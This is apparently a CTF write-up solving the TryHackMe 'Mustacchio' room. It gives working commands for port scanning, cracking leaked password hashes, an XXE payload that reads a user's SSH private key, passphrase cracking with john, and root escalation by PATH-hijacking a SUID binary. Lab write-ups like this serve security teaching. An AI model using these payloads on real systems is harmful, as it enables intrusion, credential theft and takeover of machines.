Challenge Link: https://tryhackme.com/room/mustacchio
I started the enumeration with nmap scan to look for open ports and running services. You can also use rustscan for faster results using the command shown below.
❯ nmap -sC -sV -Pn -p- -T4 --max-rate=1000 10.10.192.38 -oN nmap.txt Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-12 13:10 IST Stats: 0:02:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 60.95% done; ETC: 13:15 (0:01:44 remaining) Nmap scan report for 10.10.192.38 Host is up (0.19s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA) | 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA) |_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Mustacchio | Home 8765/tcp open http nginx 1.10.3 (Ubuntu) |_http-server-header: nginx/1.10.3 (Ubuntu) |_http-title: Mustacchio | Login Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
As you can see multiple ports are open, and different services are running on each port. First let's enumerate the apache server on port 80.
While going through the website I found two hashes in
/custom/js/mobile.js and the second hash in
Next, I cracked these hashes using
hashcat and found that both the hash are of text "bull*****".
Directory brute forcing doesn't reveal any important webpage, so I started to enumerate the
nginx server on port 8765 and found a login page.
I was able to login using creds, admin:bull***** and after logging in, I found a comment functionality.
Adding "hello" text doesn't reflect anything. I thought it could be XSS but the normal XSS payload also didn't work. After checking the source code of
home.php, I found something interesting.
The source code clearly shows that this can be a XXE vulnerability. Also in the source code I found the comment Barry, you can now SSH in using your key! and this confirms that using XXE we have to read barry's SSH key. Also I found an interesting file in the source code
This is XML, so using the same format I tried to add the comment.
<comment> <name>Joe Hamd</name> <author>Barry Clad</author> <com>hello.</com> </comment>
This time it worked successfully. Now it's time to exploit the XXE so that we can read internal files like barry's SSH key by using the following payload:
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]> <comment> <name>Joe Hamd</name> <author>Barry Clad</author> <com>&xxe;</com> </comment>
Now we have the
id_rsa that can be used to SSH into the machine as user barry, but before that we need to crack the passphrase using
❯ python /usr/share/john/ssh2john.py id_rsa > hash ❯ ../../jumbo/run/john --wordlist=../../rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status uri***** (id_rsa) 1g 0:00:00:02 DONE (2021-06-12 14:17) 0.4048g/s 1202Kp/s 1202Kc/s 1202KC/s urieljr.k..urielfabricio07 Use the "--show" option to display all of the cracked passwords reliably Session completed.
Now using this passphrase and
id_rsa we can SSH into the machine.
ssh firstname.lastname@example.org -i id_rsa The authenticity of host '10.10.255.10 (10.10.255.10)' can't be established. ECDSA key fingerprint is SHA256:g//RSEsVCZF6FIydF0R24Gmek8fI6D7kRnDXF3fNK9Y. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.255.10' (ECDSA) to the list of known hosts. Enter passphrase for key 'id_rsa': . . . barry@mustacchio:~$ id uid=1003(barry) gid=1003(barry) groups=1003(barry),4(adm)
I started to find SUID binaries using the command shown below.
barry@mustacchio:~$ find / -perm -u=s -type f 2>/dev/null . . . /usr/bin/sudo /usr/bin/newuidmap /usr/bin/gpasswd /home/joe/live_log
/home/joe/live_log binary looks interesting. After running strings command on this binary, I found that it is using
tail command to read the
barry@mustacchio:~$ strings /home/joe/live_log /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid printf system __cxa_finalize setgid __libc_start_main GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u+UH A\A]A^A_ Live Nginx Log Reader tail -f /var/log/nginx/access.log
Now if we observe carefully,
tail is not called from it's actual path, we can take advantage of this by adding our own path in $PATH environment variable and creating a new file with name
barry@mustacchio:/tmp$ nano tail barry@mustacchio:/tmp$ cat tail #!/bin/sh bash barry@mustacchio:/tmp$ chmod 777 tail barry@mustacchio:/tmp$ export PATH=/tmp:$PATH barry@mustacchio:/tmp$ /home/joe/live_log root@mustacchio:/tmp# id uid=0(root) gid=0(root) groups=0(root),4(adm),1003(barry)
We are root now and we have completed the challenge successfully!
- Password cracking
- Finding and exploiting XXE
- SUID binary exploitation
Thanks for reading! For any queries you can DM me on discord golith3r00t#1859.
NOTE: The awesome artwork used in this article was created by Nicholas Roberts.